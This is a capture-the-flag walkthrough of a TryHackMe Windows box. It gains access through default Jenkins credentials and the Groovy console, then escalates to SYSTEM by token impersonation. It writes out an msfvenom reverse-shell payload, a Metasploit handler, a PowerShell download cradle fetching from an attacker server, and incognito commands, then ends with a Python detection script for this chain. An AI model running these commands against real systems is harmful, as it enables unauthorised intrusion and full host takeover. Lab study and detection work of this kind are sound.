An easy Windows box from TryHackMe: get initial access through the Jenkins Groovy script console, then abuse the SeImpersonatePrivilege user right to get SYSTEM.

Recon

Found a Jenkins instance running on the server; log in with the default credentials

admin:admin

Exploitation

Jenkins can execute Groovy scripts; leverage that to get a reverse shell on the system.

Create a Meterpreter reverse shell payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

Set up a handler in Metasploit with

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run

Set up a Python HTTP server, then download the reverse shell to the target using PowerShell with

powershell "(New-Object System.Net.WebClient).DownloadFile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Then execute shell-name.exe on the target to get a Meterpreter shell.

Running

whoami /priv

shows that SeImpersonatePrivilege is enabled.

In Metasploit, load the incognito module with

load incognito

Then check which tokens can be impersonated with

list_tokens -g

and see that the BUILTIN\Administrators token is available.

Impersonate the Administrators token with

impersonate_token "BUILTIN\Administrators"

Running getuid now shows that you are NT AUTHORITY\SYSTEM.

You now have a higher-privileged token but still need to migrate into a higher-privileged process; the safest process to migrate to is services.exe. Migrate the Meterpreter session with

migrate PID_OF_services.exe

And now you have full SYSTEM privileges.
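From the defender's side, the whole chain above leaves a distinctive process tree on the host: everything descends from the Jenkins java.exe process, and inside that subtree sit a PowerShell download cradle and a whoami /priv. The following Python sketch is an added example (not part of the original writeup) that walks a set of constructed Sysmon-style process-creation records and flags exactly that; the Jenkins install path, PIDs, host paths and command lines are constructed assumptions, not data from the box.

```python
import re

# Constructed Sysmon Event ID 1 style records (pid, parent pid, image, command line).
# All values are made up for this example; the Jenkins path is an assumed install location.
JENKINS_JAVA = r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe"
EVENTS = [
    {"pid": 1200, "ppid": 600, "image": JENKINS_JAVA, "cmd": "java.exe -jar jenkins.war"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell \"(New-Object System.Net.WebClient)"
            ".DownloadFile('http://10.10.14.5:8000/shell.exe','shell.exe')\""},
    {"pid": 1310, "ppid": 1300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell \"(New-Object System.Net.WebClient)"
            ".DownloadFile('http://10.10.14.5:8000/shell.exe','shell.exe')\""},
    {"pid": 1400, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c shell.exe"},
    {"pid": 1410, "ppid": 1400, "image": r"C:\Program Files (x86)\Jenkins\shell.exe", "cmd": "shell.exe"},
    {"pid": 1420, "ppid": 1410, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c whoami /priv"},
    # Interactive admin use under explorer.exe (ppid not in the Jenkins tree): should stay quiet.
    {"pid": 2000, "ppid": 800, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-Service"},
]

# A java.exe living under the Jenkins directory, or the jenkins.exe service wrapper.
JENKINS_PARENT = re.compile(r"\\jenkins\\.*\\java\.exe$|\\jenkins\.exe$", re.IGNORECASE)
# Download cradles of the kind used in the writeup, plus a few common equivalents.
DOWNLOAD_CRADLE = re.compile(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", re.IGNORECASE)
# Privilege enumeration that precedes the token-impersonation step.
PRIV_RECON = re.compile(r"whoami(\.exe)?\s+/priv", re.IGNORECASE)


def jenkins_descendant(event, by_pid, depth=0):
    """True if any ancestor of `event` (walking ppid links, max 16 hops) is the Jenkins process."""
    parent = by_pid.get(event["ppid"])
    if parent is None or depth > 16:
        return False
    if JENKINS_PARENT.search(parent["image"]):
        return True
    return jenkins_descendant(parent, by_pid, depth + 1)


def classify(events):
    """Map pid -> detection tags for every process spawned under Jenkins.

    Real pipelines should key on ProcessGuid rather than pid, since pids are reused."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        if not jenkins_descendant(e, by_pid):
            continue
        tags = ["jenkins-descendant"]
        if DOWNLOAD_CRADLE.search(e["cmd"]):
            tags.append("download-cradle")
        if PRIV_RECON.search(e["cmd"]):
            tags.append("privilege-recon")
        findings[e["pid"]] = tags
    return findings
```

Running classify(EVENTS) tags the cmd.exe and powershell.exe download pair, the dropped shell.exe, and the whoami /priv, while the Jenkins server itself and the interactive PowerShell session produce nothing.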